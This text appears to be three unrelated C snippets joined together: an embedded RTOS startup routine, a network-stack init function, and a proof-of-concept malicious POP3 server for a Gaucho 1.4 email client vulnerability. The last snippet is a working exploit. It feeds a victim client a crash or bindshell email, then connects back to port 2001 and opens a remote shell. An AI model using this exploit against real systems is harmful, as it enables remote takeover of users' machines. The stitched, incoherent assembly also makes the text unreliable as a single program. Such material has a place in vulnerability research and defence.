int main() { AD1PCFGL = 0xFFFF; TRISB &= ~(1<<8); SPI_Init(); uartInit(); insight_init(); #ifdef ENC28J60_H enc28j60Initialize(mac); #endif #ifdef ENC624J600_H enc624j600Initialize(mac); #endif sram_23lc1024_init(); arpInit(); arpAnnounce(mac, ip, gateway); ipv4Init(); udpInit(); tcpInit(); //tcpListen(1234, 32, handleConnection); icmpInit(); ntpInit(); //ntpRequest(ntpServer); RtosTaskInit(); RtosTaskCreate(ðTask, "Eth", EthernetTask, 5, ethTaskStk, sizeof(ethTaskStk)); RtosTaskCreate(&ledTask, "LED", LedTask, 1, ledTaskStk, sizeof(ledTaskStk)); RtosTaskRun(); while(1); return 0; }
/* * netInit - Initialize the network communications subsystem. */ void netInit(void) { strcpy(hostname, LOCALHOST); #if PPP_SUPPORT > 0 user[0] = '\0'; passwd[0] = '\0'; our_name[0] = '\0'; remote_name[0] = '\0'; explicit_remote = 0; #endif magicInit(); ipInit(); #if PPP_SUPPORT > 0 pppInit(); #endif #if ETHER_SUPPORT > 0 // etherInit(); #endif tcpInit(); #if UDP_SUPPORT > 0 udpInit(); #endif }
int main(int argc, char* argv[]) { printf("Proof-of-Concept POP3 server for Gaucho Ver 1.4 Vulnerability\n"); if(argc != 2) { printUsage(argv[0]); return 1; } int mode = atoi(argv[1]); if(mode != 1 && mode != 2) { printf("\nINVALID MODE!\n"); printUsage(argv[0]); return 1; } if(!tcpInit()) { printf("Cannot start Winsock!\n"); return 1; } SOCKET s = tcpListen(110); if(s == INVALID_SOCKET) { printf("Cannot create listening socket!\n"); return 1; } printf("Listening on POP3 port 110...\n"); struct sockaddr_in sin; int sin_size = sizeof(sin); SOCKET client = WSAAccept(s, (SOCKADDR *)&sin, &sin_size, NULL, 0); char buffer[1024]; int recvSize; if(client != INVALID_SOCKET) { // POP3 banner send(client, OK_MSG, strlen(OK_MSG), 0); recvSize = recv(client, buffer, sizeof(buffer), 0); if(recvSize <= 0) return 1; fwrite(buffer, recvSize, 1, stdout); // OK to USER send(client, OK_MSG, strlen(OK_MSG), 0); recvSize = recv(client, buffer, sizeof(buffer), 0); if(recvSize <= 0) return 1; fwrite(buffer, recvSize, 1, stdout); // OK to PASS send(client, OK_MSG, strlen(OK_MSG), 0); recvSize = recv(client, buffer, sizeof(buffer), 0); if(recvSize <= 0) return 1; fwrite(buffer, recvSize, 1, stdout); // REPLY to STAT send(client, STAT_REPLY, strlen(STAT_REPLY), 0); recvSize = recv(client, buffer, sizeof(buffer), 0); if(recvSize <= 0) return 1; fwrite(buffer, recvSize, 1, stdout); // REPLY to UIDL genUIDLreply(UIDL_REPLY); send(client, STAT_REPLY, strlen(STAT_REPLY), 0); send(client, UIDL_REPLY, strlen(UIDL_REPLY), 0); recvSize = recv(client, buffer, sizeof(buffer), 0); if(recvSize <= 0) return 1; fwrite(buffer, recvSize, 1, stdout); // REPLY to LIST send(client, STAT_REPLY, strlen(STAT_REPLY), 0); recvSize = recv(client, buffer, sizeof(buffer), 0); if(recvSize <= 0) return 1; fwrite(buffer, recvSize, 1, stdout); if(mode == 1) { // send malicious email send(client, (char *)pocEmail, strlen((char *)pocEmail), 0); printf("POC crash email sent...\n"); recvSize = recv(client, buffer, sizeof(buffer), 0); if(recvSize <= 0) return 1; fwrite(buffer, recvSize, 1, stdout); } else { // send malicious email send(client, (char *)bindShellEmail, strlen((char *)bindShellEmail), 0); printf("Bindshell email sent. Sleeping for 2 seconds...\n"); Sleep(2000); //================================= Connect to the target ============================== SOCKET sock = socket(AF_INET, SOCK_STREAM, 0); if(sock == INVALID_SOCKET) { printf("Invalid socket return in socket() call.\n"); WSACleanup(); return -1; } sin.sin_family = AF_INET; sin.sin_port = htons(2001); if(connect(sock, (sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR) { printf("Exploit Failed. SOCKET_ERROR return in connect call.\n"); closesocket(sock); WSACleanup(); return -1; } printf("\n"); shell(sock); } } return 0; }